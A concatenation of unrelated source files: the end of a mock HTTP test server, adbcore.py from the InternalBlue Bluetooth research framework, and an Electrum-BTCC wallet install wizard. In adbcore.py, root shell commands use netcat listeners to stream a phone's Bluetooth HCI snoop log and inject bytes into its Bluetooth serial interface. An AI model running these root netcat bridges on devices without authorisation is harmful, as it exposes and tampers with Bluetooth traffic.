self.wfile.write('{}'.encode('utf-8'))
return
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(to_send).encode('utf-8'))
def _handle_auth(self):
if not self._auth_response:
self.send_response(401)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(self._auth_response).encode('utf-8'))
def do_GET(self): #pylint:disable=invalid-name
"""Respond to a GET request."""
if self._req_queue is not None:
headers = self._format_headers()
self._req_queue.put(Request('GET', self.path, headers, None))
if self.path.startswith('/api/splitChanges'):
self._handle_split_changes()
elif self.path.startswith('/api/segmentChanges'):
self._handle_segment_changes()
elif self.path.startswith('/api/auth'):
self._handle_auth()
else:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
def do_POST(self): #pylint:disable=invalid-name
"""Respond to a GET request."""
if self._req_queue is not None:
headers = self._format_headers()
length = int(headers.get('content-length'))
body = self.rfile.read(length) if length else None
self._req_queue.put(Request('POST', self.path, headers, body))
if self.path in set(['/api/testImpressions/bulk', '/testImpressions/count',
'/api/events/bulk', '/metrics/times', '/metrics/count',
'/metrics/gauge']):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
else:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
def _format_headers(self):
"""Format headers and return them as a dict."""
return dict(zip([k.lower() for k in self.headers.keys()], self.headers.values()))
|
adbcore.py
|
#!/usr/bin/env python2
import struct
import threading
from time import sleep
from typing import Optional
from future import standard_library
import datetime
import socket
import queue as queue2k
import random
from ppadb.device import Device
from ppadb.connection import Connection
from ppadb.client import Client as AdbClient
from . import hci
from .utils import bytes_to_hex
from .utils.packing import u32
from .core import InternalBlue
standard_library.install_aliases()
class ADBCore(InternalBlue):
def __init__(
self,
queue_size=1000,
btsnooplog_filename="btsnoop.log",
log_level="info",
serial=False,
data_directory=".",
replay=False,
):
super(ADBCore, self).__init__(
queue_size,
btsnooplog_filename,
log_level,
data_directory,
replay,
)
# Connect to adb device
self.hciport: Optional[int] = None # hciport is the port number of the forwarded HCI snoop port (8872). The inject port is at hciport+1
self.serial = serial # use serial su busybox scripting and do not try bluetooth.default.so
self.doublecheck = False
self.client = AdbClient(host="127.0.0.1", port=5037)
def device(self) -> Device:
return self.client.device(self.interface)
def device_list(self):
"""
Get a list of the connected devices
"""
if self.exit_requested:
self.shutdown()
if self.running:
self.logger.warning("Already running. call shutdown() first!")
return []
if self.replay:
return [(self, "adb_replay", "adb: ReplayDevice")]
# Check for connected adb devices
try:
adb_devices = self.client.devices()
except ValueError:
self.logger.info(
"Could not find devices with pwnlib. If you see devices with `adb devices`, try to remove the lines 'for field in fields[2:]:... = v' in `pwnlib/adb/adb.py`."
)
adb_devices = 0
except:
adb_devices = 0
if adb_devices == 0 or len(adb_devices) == 0:
self.logger.info("No adb devices found.")
return []
# At least one device found
self.logger.info("Found multiple adb devices")
# Enumerate over found devices and put them into an array of tuple
# First index is a self reference of the class
# Second index is the identifier which is passed to connect()
# Third index is the label which is shown in options(...)
device_list = []
for d in adb_devices:
device_list.append((self, d.serial, "adb: %s (%s)" % (d.get_serial_no(), d.get_properties()['ro.product.model'])))
return device_list
def local_connect(self):
"""
Start the framework by connecting to the Bluetooth Stack of the Android
device via adb and the debugging TCP ports.
"""
# setup sockets
# on magisk-rooted devices there is sometimes already a read socket and this first setup needs to be skipped...
if not self.serial:
if not self._setupSockets():
self.logger.info("Could not connect using Bluetooth module.")
self.logger.info(
"Trying to set up connection for rooted smartphone with busybox installed."
)
else:
return True # successfully finished setup with bluetooth.default.so
if not self._setupSerialSu():
self.logger.critical("Failed to setup scripts for rooted devices.")
return False
# try again
if not self._setupSockets():
self.logger.critical("No connection to target device.")
self.logger.info(
"Check if:\n -> Bluetooth is active\n -> Bluetooth Stack has Debug Enabled\n -> BT HCI snoop log is activated\n -> USB debugging is authorized\n"
)
return False
return True
def _read_btsnoop_hdr(self):
"""
Read the btsnoop header (see RFC 1761) from the snoop socket (s_snoop).
"""
data = self.s_snoop.recv(16)
if len(data) < 16:
return None
if (self.write_btsnooplog) and self.btsnooplog_file.tell() == 0:
self.btsnooplog_file.write(data)
self.btsnooplog_file.flush()
btsnoop_hdr = (
data[:8],
u32(data[8:12], endian="big"),
u32(data[12:16], endian="big"),
)
self.logger.debug("BT Snoop Header: %s, version: %d, data link type: %d" % btsnoop_hdr)
return btsnoop_hdr
def _btsnoop_parse_time(self, time):
"""
Taken from: https://github.com/joekickass/python-btsnoop
Record time is a 64-bit signed integer representing the time of packet arrival,
in microseconds since midnight, January 1st, 0 AD nominal Gregorian.
In order to avoid leap-day ambiguity in calculations, note that an equivalent
epoch may be used of midnight, January 1st 2000 AD, which is represented in
this field as 0x00E03AB44A676000.
"""
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(
microseconds=time
) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
def _recvThreadFunc(self):
"""
This is the run-function of the recvThread. It receives HCI events from the
s_snoop socket. The HCI packets are encapsulated in btsnoop records (see RFC 1761).
Received HCI packets are being put into the queues inside registeredHciRecvQueues and
passed to the callback functions inside registeredHciCallbacks.
The thread stops when exit_requested is set to True. It will do that on its own
if it encounters a fatal error or the stackDumpReceiver reports that the chip crashed.
"""
self.logger.debug("Receive Thread started.")
while not self.exit_requested:
# Read the record header
record_hdr = b""
while not self.exit_requested and len(record_hdr) < 24:
try:
recv_data = self.s_snoop.recv(24 - len(record_hdr))
self.logger.debug(
"recvThreadFunc: received bt_snoop data "
+ bytes_to_hex(recv_data)
)
if len(recv_data) == 0:
self.logger.info(
"recvThreadFunc: bt_snoop socket was closed by remote site. stopping recv thread..."
)
self.exit_requested = True
break
record_hdr += recv_data
except socket.timeout:
pass # this is ok. just try again without error
if not record_hdr or len(record_hdr) != 24:
if not self.exit_requested:
self.logger.warning("recvThreadFunc: Cannot recv record_hdr. stopping.")
self.exit_requested = True
break
if self.write_btsnooplog:
self.btsnooplog_file.write(record_hdr)
self.btsnooplog_file.flush()
orig_len, inc_len, flags, drops, time64 = struct.unpack(
">IIIIq", record_hdr
)
# Read the record data
record_data = bytearray()
while not self.exit_requested and len(record_data) < inc_len:
try:
recv_data = self.s_snoop.recv(inc_len - len(record_data))
if len(recv_data) == 0:
self.logger.info(
"recvThreadFunc: bt_snoop socket was closed by remote site. stopping.."
)
self.exit_requested = True
break
record_data += bytearray(recv_data)
except socket.timeout:
pass # this is ok. just try again without error
if not record_data or len(record_data) != inc_len:
if not self.exit_requested:
self.logger.warning("recvThreadFunc: Cannot recv data. stopping.")
self.exit_requested = True
break
if self.write_btsnooplog:
self.btsnooplog_file.write(record_data)
self.btsnooplog_file.flush()
try:
parsed_time = self._btsnoop_parse_time(time64)
except OverflowError:
parsed_time = None
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (
hci.parse_hci_packet(record_data),
orig_len,
inc_len,
flags,
drops,
parsed_time,
)
# self.logger.debug(
# "_recvThreadFunc Recv: [" + str(parsed_time) + "] " + str(record[0])
# )
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues:
if filter_function == None or filter_function(record):
try:
queue.put(record, block=False)
except queue2k.Full:
self.logger.warning(
"recvThreadFunc: A recv queue is full. dropping packets.."
)
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
# Check if the stackDumpReceiver has noticed that the chip crashed.
# if self.stackDumpReceiver and self.stackDumpReceiver.stack_dump_has_happened:
# A stack dump has happened!
# self.logger.warning("recvThreadFunc: The controller sent a stack dump.")
# self.exit_requested = True
self.logger.debug("Receive Thread terminated.")
def _setupSockets(self):
"""
Forward the HCI snoop and inject ports from the Android device to
the host (using adb). Open TCP sockets (s_snoop, s_inject) to connect
to the forwarded ports. Read the btsnoop header from the s_snoop
socket in order to verify that the connection actually works correctly.
"""
# In order to support multiple parallel instances of InternalBlue
# (with multiple attached Android devices) we must not hard code the
# forwarded port numbers. Therefore we choose the port numbers
# randomly and hope that they are not already in use.
self.hciport = random.randint(
60000, 65534
) # minus 1, as we are using hciport + 1
self.logger.debug(
"_setupSockets: Selected random ports snoop=%d and inject=%d"
% (self.hciport, self.hciport + 1)
)
# Forward ports 8872 and 8873. Ignore self.logger.info() outputs by the adb function.
self.device().forward(f"tcp:{self.hciport}", "tcp:8872")
self.device().forward(f"tcp:{self.hciport+1}", "tcp:8873")
# Connect to hci injection port
self.s_inject = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.s_inject.connect(("127.0.0.1", self.hciport + 1))
self.s_inject.settimeout(0.5)
except socket.error:
self.logger.warning("Could not connect to adb. Is your device authorized?")
return False
# Connect to hci snoop log port
self.s_snoop = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_snoop.connect(("127.0.0.1", self.hciport))
self.s_snoop.settimeout(0.5)
# Read btsnoop header
if self._read_btsnoop_hdr() is None:
self.logger.warning("Could not read btsnoop header")
self.s_inject.close()
self.s_snoop.close()
self.s_inject = self.s_snoop = None
self.device().killforward_all()
return False
return True
def _teardownSockets(self):
"""
Close s_snoop and s_inject sockets. Remove port forwarding with adb.
"""
if self.s_inject != None:
self.s_inject.close()
self.s_inject = None
if self.s_snoop != None:
self.s_snoop.close()
self.s_snoop = None
if self.hciport is not None:
hciport = self.hciport
self.device().killforward_all()
def _spawn(self, cmd: str):
conn: Connection = self.device().create_connection()
cmd = "exec:{}".format(cmd)
conn.send(cmd)
while True:
sleep(1)
def _setupSerialSu(self):
"""
To run on any rooted device, we can also use some shellscripting.
This is slower but at least works on any device.
Commands on a S10e with Samsung Stock ROM + Magisk + busybox:
tail -f -n +0 /data/log/bt/btsnoop_hci.log | nc -l -p 8872
nc -l -p 8873 >/sdcard/internalblue_input.bin
tail -f /sdcard/internalblue_input.bin >>/dev/ttySAC1
Locations of the Bluetooth serial interface and btsnoop log file might differ.
The second part *could* be combined, but it somehow does not work (SELinux?).
The ADB Python bindings will kill the processes automatically :)
"""
# In sending direction, the format is different.
self.serial = True
# check dependencies
which_cmd = '''
echo $PATH | while read -d: directory; do
[ -x "$directory/{name}" ] || continue;
echo -n "$directory/{name}\\x00";
done
[ -x "{name}" ] && echo -n "$PWD/{name}\\x00"
'''.format(name="su")
su_path = self.device().shell(f"sh -c '{which_cmd}'")
if su_path is None or len(su_path) == 0:
self.logger.critical("su not found, rooted smartphone required!")
return False
if self.device().shell("su -c 'which nc'") == "":
self.logger.critical("nc not found, install busybox!")
return False
# automatically detect the proper serial device with lsof
logfile = self.device().shell("su -c \"lsof | grep btsnoop_hci.log | tail -n 1\" | awk '{print $NF}'")[:-1]
self.logger.info("Android btsnoop logfile %s...", logfile)
interface = self.device().shell("su -c \"lsof | grep bluetooth | grep tty\" | awk '{print $NF}'")[:-1]
self.logger.info("Android Bluetooth interface %s...", interface)
if logfile == "":
self.logger.critical("Could not find Bluetooth logfile. Enable Bluetooth snoop logging.")
return False
if interface == "":
self.logger.critical("Could not find Bluetooth interface. Enable Bluetooth.")
return False
# spawn processes
threading.Thread(target=self._spawn, args=(f"su -c \"tail -f -n +0 {logfile} | nc -l -p 8872\"",)).start()
threading.Thread(target=self._spawn, args=(f"su -c \"nc -l -p 8873 >/sdcard/internalblue_input.bin\"",)).start()
threading.Thread(target=self._spawn, args=(f"su -c \"tail -f /sdcard/internalblue_input.bin >> {interface}\"",)).start()
sleep(2)
return True
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_btcc.wallet import Wallet
from electrum_btcc.storage import WalletStorage
from electrum_btcc.util import UserCancelled, InvalidPassword
from electrum_btcc.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_btcc.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:T4PsyoR5gC8B... \t-> LXqi2tzER...\n' +
'p2wpkh-p2sh:T4PsyoR5gC8B... \t-> MUuWxSpVC...\n' +
'p2wpkh:T4PsyoR5gC8B... \t-> btcc1q3fjf...')
# note: full key is T4PsyoR5gC8BGEoTe8So7YQWPnvdkqTJqRVpLoMmZVqBsunDdeuJ
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-BTCC - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-btcc.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-BTCC wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
sf.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sf
